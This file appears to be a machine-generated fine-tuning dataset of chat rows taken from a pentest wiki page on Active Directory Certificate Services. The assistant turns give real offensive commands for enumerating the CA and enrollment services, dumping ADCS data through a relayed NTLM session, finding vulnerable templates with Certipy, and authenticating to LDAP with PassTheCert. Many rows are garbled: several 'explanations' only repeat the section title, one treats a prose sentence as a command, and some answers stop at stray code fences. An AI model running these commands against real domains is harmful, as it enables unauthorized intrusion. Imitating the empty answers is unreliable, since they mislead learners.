"You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Certificate Services (AD-CS) - pKIEnrollmentService objects", "response": "Alternatively, information like the PKI's CA and DNS names can be gathered through LDAP.\n\n::: tabs\n\n=== netexec\n\nnetexec's adcs module (Python) can be used to find PKI enrollment services in AD.\n\n``bash\nnetexec ldap 'domaincontroller' -d 'domain' -u 'user' -p 'password' -M adcs\n`\n\n=== windapsearch\n\nwindapsearch (Python) can be used to manually to the LDAP query.\n\n`bash\nwindapsearch -m custom --filter '(objectCategory=pKIEnrollmentService)' --base 'CN=Configuration,DC=domain,DC=local' --attrs dn,dnshostname --dc 'domaincontroller' -d 'domain.local' -u 'user' -p 'password'\n`\n\n=== ntlmrelayx\n\nWith Impacket's ntlmrelayx (Python), thanks to SAERXCIT (PR#1214), it is possible to gather information regarding ADCS like the name and host of the CA, the certificate templates enrollment rights for those allowing client authentication and not requiring manager approval, etc. With ntlmrelayx, these information can be gathered through a relayed LDAP session.\n\n`bash\nntlmrelayx -t \"ldap://domaincontroller\" --dump-adcs\n``\n\n:::", "metadata": {"corpus_index": 171, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use netexec for certificate services (ad-cs) - pkienrollmentservice objects?"}, {"role": "assistant", "content": "netexec ldap 'domaincontroller' -d 'domain' -u 'user' -p 'password' -M adcs"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use netexec for certificate services (ad-cs) - pkienrollmentservice objects?", "response": "netexec ldap 'domaincontroller' -d 'domain' -u 'user' -p 'password' -M adcs", "metadata": {"corpus_index": 172, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "netexec"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate Services (AD-CS) - pKIEnrollmentService objects?"}, {"role": "assistant", "content": "netexec ldap 'domaincontroller' -d 'domain' -u 'user' -p 'password' -M adcs"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate Services (AD-CS) - pKIEnrollmentService objects?", "response": "netexec ldap 'domaincontroller' -d 'domain' -u 'user' -p 'password' -M adcs", "metadata": {"corpus_index": 172, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `netexec ldap 'domaincontroller' -d 'domain' -u 'user' -p 'password' -M adcs`?"}, {"role": "assistant", "content": "This command is used for certificate services (ad-cs) - pkienrollmentservice objects. pKIEnrollmentService objects"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `netexec ldap 'domaincontroller' -d 'domain' -u 'user' -p 'password' -M adcs`?", "response": "This command is used for certificate services (ad-cs) - pkienrollmentservice objects. pKIEnrollmentService objects", "metadata": {"corpus_index": 172, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the windapsearch syntax for certificate services (ad-cs) - pkienrollmentservice objects?"}, {"role": "assistant", "content": "windapsearch -m custom --filter '(objectCategory=pKIEnrollmentService)' --base 'CN=Configuration,DC=domain,DC=local' --attrs dn,dnshostname --dc 'domaincontroller' -d 'domain.local' -u 'user' -p 'password'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the windapsearch syntax for certificate services (ad-cs) - pkienrollmentservice objects?", "response": "windapsearch -m custom --filter '(objectCategory=pKIEnrollmentService)' --base 'CN=Configuration,DC=domain,DC=local' --attrs dn,dnshostname --dc 'domaincontroller' -d 'domain.local' -u 'user' -p 'password'", "metadata": {"corpus_index": 173, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "windapsearch"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate Services (AD-CS) - pKIEnrollmentService objects?"}, {"role": "assistant", "content": "windapsearch -m custom --filter '(objectCategory=pKIEnrollmentService)' --base 'CN=Configuration,DC=domain,DC=local' --attrs dn,dnshostname --dc 'domaincontroller' -d 'domain.local' -u 'user' -p 'password'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate Services (AD-CS) - pKIEnrollmentService objects?", "response": "windapsearch -m custom --filter '(objectCategory=pKIEnrollmentService)' --base 'CN=Configuration,DC=domain,DC=local' --attrs dn,dnshostname --dc 'domaincontroller' -d 'domain.local' -u 'user' -p 'password'", "metadata": {"corpus_index": 173, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `windapsearch -m custom --filter '(objectCategory=pKIEnrollmentService)' --base 'CN=Configuration,DC=domain,DC=local' --attrs dn,dnshostname --dc 'domaincontroller' -d 'domain.local' -u 'user' -p 'password'`?"}, {"role": "assistant", "content": "This command is used for certificate services (ad-cs) - pkienrollmentservice objects. pKIEnrollmentService objects"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `windapsearch -m custom --filter '(objectCategory=pKIEnrollmentService)' --base 'CN=Configuration,DC=domain,DC=local' --attrs dn,dnshostname --dc 'domaincontroller' -d 'domain.local' -u 'user' -p 'password'`?", "response": "This command is used for certificate services (ad-cs) - pkienrollmentservice objects. pKIEnrollmentService objects", "metadata": {"corpus_index": 173, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the ntlmrelayx syntax for certificate services (ad-cs) - pkienrollmentservice objects?"}, {"role": "assistant", "content": "ntlmrelayx -t \"ldap://domaincontroller\" --dump-adcs"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the ntlmrelayx syntax for certificate services (ad-cs) - pkienrollmentservice objects?", "response": "ntlmrelayx -t \"ldap://domaincontroller\" --dump-adcs", "metadata": {"corpus_index": 174, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ntlmrelayx"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate Services (AD-CS) - pKIEnrollmentService objects?"}, {"role": "assistant", "content": "ntlmrelayx -t \"ldap://domaincontroller\" --dump-adcs"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate Services (AD-CS) - pKIEnrollmentService objects?", "response": "ntlmrelayx -t \"ldap://domaincontroller\" --dump-adcs", "metadata": {"corpus_index": 174, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ntlmrelayx -t \"ldap://domaincontroller\" --dump-adcs`?"}, {"role": "assistant", "content": "This command is used for certificate services (ad-cs) - pkienrollmentservice objects. pKIEnrollmentService objects"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ntlmrelayx -t \"ldap://domaincontroller\" --dump-adcs`?", "response": "This command is used for certificate services (ad-cs) - pkienrollmentservice objects. pKIEnrollmentService objects", "metadata": {"corpus_index": 174, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Certificate Services (AD-CS) - Attack paths in the context of penetration testing"}, {"role": "assistant", "content": "> [!TIP]\n> Certipy (Python) and Certify (C#) can also identify the PKI enrollment services and potential attack paths.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the Certipy (Python) tool can be used to operate multiple attacks and enumeration operations.\n\n```python"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Certificate Services (AD-CS) - Attack paths in the context of penetration testing", "response": "> [!TIP]\n> Certipy (Python) and Certify (C#) can also identify the PKI enrollment services and potential attack paths.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the Certipy (Python) tool can be used to operate multiple attacks and enumeration operations.\n\n```python", "metadata": {"corpus_index": 175, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate Services (AD-CS) - Attack paths during a pentest?"}, {"role": "assistant", "content": "> [!TIP]\n> Certipy (Python) and Certify (C#) can also identify the PKI enrollment services and potential attack paths.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the Certipy (Python) tool can be used to operate multiple attacks and enumeration operations.\n\n```python"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate Services (AD-CS) - Attack paths during a pentest?", "response": "> [!TIP]\n> Certipy (Python) and Certify (C#) can also identify the PKI enrollment services and potential attack paths.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the Certipy (Python) tool can be used to operate multiple attacks and enumeration operations.\n\n```python", "metadata": {"corpus_index": 175, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about enumerate and save text, json and bloodhound (original) outputs?"}, {"role": "assistant", "content": "certipy find -u 'user@domain.local' -p 'password' -dc-ip 'DC_IP' -old-bloodhound"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about enumerate and save text, json and bloodhound (original) outputs?", "response": "certipy find -u 'user@domain.local' -p 'password' -dc-ip 'DC_IP' -old-bloodhound", "metadata": {"corpus_index": 176, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on enumerate and save text, json and bloodhound (original) outputs"}, {"role": "assistant", "content": "certipy find -u 'user@domain.local' -p 'password' -dc-ip 'DC_IP' -old-bloodhound"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on enumerate and save text, json and bloodhound (original) outputs", "response": "certipy find -u 'user@domain.local' -p 'password' -dc-ip 'DC_IP' -old-bloodhound", "metadata": {"corpus_index": 176, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about quickly spot vulnerable elements?"}, {"role": "assistant", "content": "certipy find -u 'user@domain.local' -p 'password' -dc-ip 'DC_IP' -vulnerable -stdout\n``\n\nCertipy also supports BloodHound. With the -old-bloodhound option, the data will be exported for the original version of BloodHound. With the -bloodhound option, the data will be exported for the modified version of BloodHound, forked by Certipy's author (default output when no flag is set).\n\nThe tool also supports multiple output types (text, json, stdout).\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to operate multiple attacks and enumeration operations.\n\n`powershell\nCertify.exe cas\n`\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about quickly spot vulnerable elements?", "response": "certipy find -u 'user@domain.local' -p 'password' -dc-ip 'DC_IP' -vulnerable -stdout\n``\n\nCertipy also supports BloodHound. With the -old-bloodhound option, the data will be exported for the original version of BloodHound. With the -bloodhound option, the data will be exported for the modified version of BloodHound, forked by Certipy's author (default output when no flag is set).\n\nThe tool also supports multiple output types (text, json, stdout).\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to operate multiple attacks and enumeration operations.\n\n`powershell\nCertify.exe cas\n`\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 177, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform quickly spot vulnerable elements?"}, {"role": "assistant", "content": "certipy find -u 'user@domain.local' -p 'password' -dc-ip 'DC_IP' -vulnerable -stdout\n``\n\nCertipy also supports BloodHound. With the -old-bloodhound option, the data will be exported for the original version of BloodHound. With the -bloodhound option, the data will be exported for the modified version of BloodHound, forked by Certipy's author (default output when no flag is set).\n\nThe tool also supports multiple output types (text, json, stdout).\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to operate multiple attacks and enumeration operations.\n\n`powershell\nCertify.exe cas\n`\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform quickly spot vulnerable elements?", "response": "certipy find -u 'user@domain.local' -p 'password' -dc-ip 'DC_IP' -vulnerable -stdout\n``\n\nCertipy also supports BloodHound. With the -old-bloodhound option, the data will be exported for the original version of BloodHound. With the -bloodhound option, the data will be exported for the modified version of BloodHound, forked by Certipy's author (default output when no flag is set).\n\nThe tool also supports multiple output types (text, json, stdout).\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to operate multiple attacks and enumeration operations.\n\n`powershell\nCertify.exe cas\n`\n\nAlso, the Invoke-PassTheCert fork can be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 177, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Certipy for quickly spot vulnerable elements?"}, {"role": "assistant", "content": "Certipy also supports BloodHound. With the `-old-bloodhound` option, the data will be exported for the original version of [BloodHound](https://github.com/BloodHoundAD/BloodHound). With the `-bloodhound` option, the data will be exported for the modified version of BloodHound, [forked](https://github.com/ly4k/BloodHound/) by Certipy's [author](https://twitter.com/ly4k_) (default output when no flag is set).\n\nThe tool also supports multiple output types (text, json, stdout).\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The `-scheme` flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to operate multiple attacks and enumeration operations."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Certipy for quickly spot vulnerable elements?", "response": "Certipy also supports BloodHound. With the `-old-bloodhound` option, the data will be exported for the original version of [BloodHound](https://github.com/BloodHoundAD/BloodHound). With the `-bloodhound` option, the data will be exported for the modified version of BloodHound, [forked](https://github.com/ly4k/BloodHound/) by Certipy's [author](https://twitter.com/ly4k_) (default output when no flag is set).\n\nThe tool also supports multiple output types (text, json, stdout).\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The `-scheme` flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to operate multiple attacks and enumeration operations.", "metadata": {"corpus_index": 178, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through quickly spot vulnerable elements"}, {"role": "assistant", "content": "Certipy also supports BloodHound. With the `-old-bloodhound` option, the data will be exported for the original version of [BloodHound](https://github.com/BloodHoundAD/BloodHound). With the `-bloodhound` option, the data will be exported for the modified version of BloodHound, [forked](https://github.com/ly4k/BloodHound/) by Certipy's [author](https://twitter.com/ly4k_) (default output when no flag is set).\n\nThe tool also supports multiple output types (text, json, stdout).\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The `-scheme` flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to operate multiple attacks and enumeration operations."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through quickly spot vulnerable elements", "response": "Certipy also supports BloodHound. With the `-old-bloodhound` option, the data will be exported for the original version of [BloodHound](https://github.com/BloodHoundAD/BloodHound). With the `-bloodhound` option, the data will be exported for the modified version of BloodHound, [forked](https://github.com/ly4k/BloodHound/) by Certipy's [author](https://twitter.com/ly4k_) (default output when no flag is set).\n\nThe tool also supports multiple output types (text, json, stdout).\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The `-scheme` flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to operate multiple attacks and enumeration operations.", "metadata": {"corpus_index": 178, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for quickly spot vulnerable elements?"}, {"role": "assistant", "content": "Also, the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for quickly spot vulnerable elements?", "response": "Also, the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash).", "metadata": {"corpus_index": 179, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Also, the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).`?"}, {"role": "assistant", "content": "This command is used for quickly spot vulnerable elements. quickly spot vulnerable elements"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Also, the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can be used, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).`?", "response": "This command is used for quickly spot vulnerable elements. quickly spot vulnerable elements", "metadata": {"corpus_index": 179, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Import the PowerShell script and show its manual?"}, {"role": "assistant", "content": "Import-Module .\\Invoke-PassTheCert.ps1\n.\\Invoke-PassTheCert.ps1 -?"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Import the PowerShell script and show its manual?", "response": "Import-Module .\\Invoke-PassTheCert.ps1\n.\\Invoke-PassTheCert.ps1 -?", "metadata": {"corpus_index": 180, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Import the PowerShell script and show its manual?"}, {"role": "assistant", "content": "Import-Module .\\Invoke-PassTheCert.ps1\n.\\Invoke-PassTheCert.ps1 -?"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Import the PowerShell script and show its manual?", "response": "Import-Module .\\Invoke-PassTheCert.ps1\n.\\Invoke-PassTheCert.ps1 -?", "metadata": {"corpus_index": 180, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Authenticate to LDAP/S"}, {"role": "assistant", "content": "$LdapConnection = Invoke-PassTheCert-GetLDAPConnectionInstance -Server 'LDAP_IP' -Port 636 -Certificate cert.pfx"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Authenticate to LDAP/S", "response": "$LdapConnection = Invoke-PassTheCert-GetLDAPConnectionInstance -Server 'LDAP_IP' -Port 636 -Certificate cert.pfx", "metadata": {"corpus_index": 181, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Authenticate to LDAP/S"}, {"role": "assistant", "content": "$LdapConnection = Invoke-PassTheCert-GetLDAPConnectionInstance -Server 'LDAP_IP' -Port 636 -Certificate cert.pfx"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Authenticate to LDAP/S", "response": "$LdapConnection = Invoke-PassTheCert-GetLDAPConnectionInstance -Server 'LDAP_IP' -Port 636 -Certificate cert.pfx", "metadata": {"corpus_index": 181, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Enumerates all Certificate Authorities in the 'ADLAB.LOCAL' domain?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'CAs' -SearchBase 